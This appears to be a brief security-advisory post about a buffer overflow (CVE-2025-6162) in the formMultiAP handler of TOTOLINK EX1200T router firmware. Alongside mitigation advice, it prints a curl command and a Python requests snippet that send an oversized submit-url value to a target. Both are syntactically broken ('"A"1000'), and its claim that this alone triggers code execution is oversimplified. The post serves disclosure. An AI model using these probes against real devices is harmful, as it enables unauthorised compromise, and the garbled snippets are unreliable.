TOTOLINK EX1200T, Buffer Overflow Vulnerability, CVE-2025-6162 (Critical)

Listen to this Post

How the CVE Works

The vulnerability in TOTOLINK EX1200T (firmware 4.1.2cu.5232_B20210713) stems from improper handling of HTTP POST requests in the `/boafrm/formMultiAP` component. Attackers can exploit this by sending a crafted request with an oversized `submit-url` argument, triggering a buffer overflow. Due to insufficient bounds checking, this allows remote code execution (RCE) with elevated privileges. The exploit is network-accessible without authentication, making it highly critical.

DailyCVE Form

Platform: TOTOLINK EX1200T
Version: 4.1.2cu.5232_B20210713
Vulnerability: Buffer Overflow
Severity: Critical
Date: 06/23/2025

Prediction: Patch by 08/2025

What Undercode Say

curl -X POST -d "submit-url=$(python -c 'print("A"1000)')" http://target/boafrm/formMultiAP
import requests
requests.post("http://target/boafrm/formMultiAP", data={"submit-url": "A"1000})

How Exploit

1. Craft oversized `submit-url` payload.

2. Send via HTTP POST to `/boafrm/formMultiAP`.

3. Overflow triggers RCE.

Protection from this CVE

  • Apply vendor patch.
  • Disable remote management.
  • Use network segmentation.

Impact

  • Remote code execution.
  • Full device compromise.
  • Unauthorized access.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top